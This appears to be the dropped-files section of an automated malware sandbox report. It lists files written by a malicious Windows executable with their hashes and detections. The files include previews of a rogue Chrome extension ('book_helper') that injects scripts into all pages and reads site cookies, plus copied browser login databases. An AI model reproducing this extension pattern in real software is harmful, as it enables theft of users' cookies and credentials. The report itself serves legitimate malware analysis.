                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2235
                                                                                                                                                              Entropy (8bit):7.880518016071819
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                              MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                              SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                              SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                              SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):93637
                                                                                                                                                              Entropy (8bit):5.292996107428883
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                              MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                              SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                              SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                              SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\manifest.json
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2380
                                                                                                                                                              Entropy (8bit):5.687293760500434
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                              MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                              SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                              SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                              SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.html
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):280
                                                                                                                                                              Entropy (8bit):5.048307538221611
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                              MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                              SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                              SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                              SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.js
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):642
                                                                                                                                                              Entropy (8bit):4.985939227199713
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                              MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                              SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                              SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                              SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5361
                                                                                                                                                              Entropy (8bit):5.184927901937767
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:nYrRT/Xrspi863rI4+V7Sk0JCKL8xF7bOEQVuwv:nYrd/t863r3+9U4Kh
                                                                                                                                                              MD5:01D789546E2AEAF9881380C4EE5C4DD6
                                                                                                                                                              SHA1:01A9B24C8198BD661A402EDDBA0BABB1E54CAC66
                                                                                                                                                              SHA-256:2A5E7EF1FC6E72B9AFC0EC0D30E67538637DACA82EBCC6061CB075471CF3D857
                                                                                                                                                              SHA-512:ACAD5D062D1B1A018488261D1C2EDEE61AC87263FEDA15A870D6F2B4CF61EF8E3A0E7948B31A743FDA046FFDEFCEE845FA3AA2ACE2F49BCA5A7AB1297E68A9B7
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245950583460399","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245950583260338","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245950640095768","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1538886"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):34636
                                                                                                                                                              Entropy (8bit):5.539146915923536
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:nEaf7DBUckPWFr+oXLl6y1kXqKf/pUZNCgVLH2HfjrUkGfnM6vJ:lthLvjfnh
                                                                                                                                                              MD5:B8D78BF78F0834F84BF726D40FB0EEBD
                                                                                                                                                              SHA1:DDD88DAA574A84985BFC291F64065184396230AD
                                                                                                                                                              SHA-256:E039E1C07D325F0F6BF7D29195E9BC54F38D95CB0D3A6472AD7649B6787CC59B
                                                                                                                                                              SHA-512:99A39DB5F25FD7A9226C36A29F5EFF234E79B17C20603D4A3C1F6814E11DB7162DEFCB0414B0ACE7B6162122FBF88E7444D11096F3BE8BC7F1B8486762BDF34C
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245950593233950","lastpingday":"13245947458518717","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                                              C:\Users\user\AppData\Local\Login Data1611970726180
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40960
                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Login Data1611970737242
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40960
                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1611970728399
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:7-zip archive data, version 0.3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):37737
                                                                                                                                                              Entropy (8bit):7.994967159065528
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                                              MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                                              SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                                              SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                                              SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1611970730398
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:7-zip archive data, version 0.3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):553040
                                                                                                                                                              Entropy (8bit):7.999671101282436
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                                              MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                                              SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                                              SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                                              SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              Process:C:\Users\user\Desktop\N1yprTBBXs.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4999496
                                                                                                                                                              Entropy (8bit):7.663640140797365
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:98304:LWrSa24w3rQ/pE/JFBCnpcYiKAEXXPnsNSkUe:iy4wesJFqpc8dXfUSe
                                                                                                                                                              MD5:F7D7C89F3F5CBC925480B46B7B934157
                                                                                                                                                              SHA1:73E389B70CF3D8975CCBAF7D04F4C45CC80BE860
                                                                                                                                                              SHA-256:2870F899F2E9EC540DA321F603CFB1A735DCD06DF016718E663DC78FEFDF5E0A
                                                                                                                                                              SHA-512:9B972E2954C18F706A6F8012A6B76E1F4CE8E76466EAE919B55A6225C4F8574586D9F11838D8D63BDD245B11CFD3E581248E9A578F72FF2DD8B6623BEBC525EB
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: Metadefender, Detection: 22%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: N1yprTBBXs.exe, Detection: malicious
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\6272167835D47591.exe:Zone.Identifier
                                                                                                                                                              Process:C:\Users\user\Desktop\N1yprTBBXs.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):26
                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSI1983.tmp
                                                                                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):6656
                                                                                                                                                              Entropy (8bit):5.2861874904617645
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                                              MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                                              SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                                              SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                                              SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: Cyfj6XGbkd.exe, Detection: malicious
                                                                                                                                                              • Filename: N1yprTBBXs.exe, Detection: malicious
                                                                                                                                                              • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                              • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):268744
                                                                                                                                                              Entropy (8bit):5.398284390686728
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                                              MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                                              SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                                              SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                                              SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):73160
                                                                                                                                                              Entropy (8bit):6.49500452335621
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                                              MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                              SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                                              SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                                              SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):89600
                                                                                                                                                              Entropy (8bit):6.46929682960805
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                                              MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                                              SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                                              SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
                                                                                                                                                              SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):92080
                                                                                                                                                              Entropy (8bit):5.923150781730819
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                                              MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                                              SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                                              SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                                              SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\download\download_engine.dll
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3512776
                                                                                                                                                              Entropy (8bit):6.514740710935125
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                                              MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                                              SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                                              SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                                              SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):503808
                                                                                                                                                              Entropy (8bit):6.4043708480235715
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                                              MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                                              SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                                              SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                                              SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):348160
                                                                                                                                                              Entropy (8bit):6.56488891304105
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                                              MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                                              SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                                              SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                                              SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
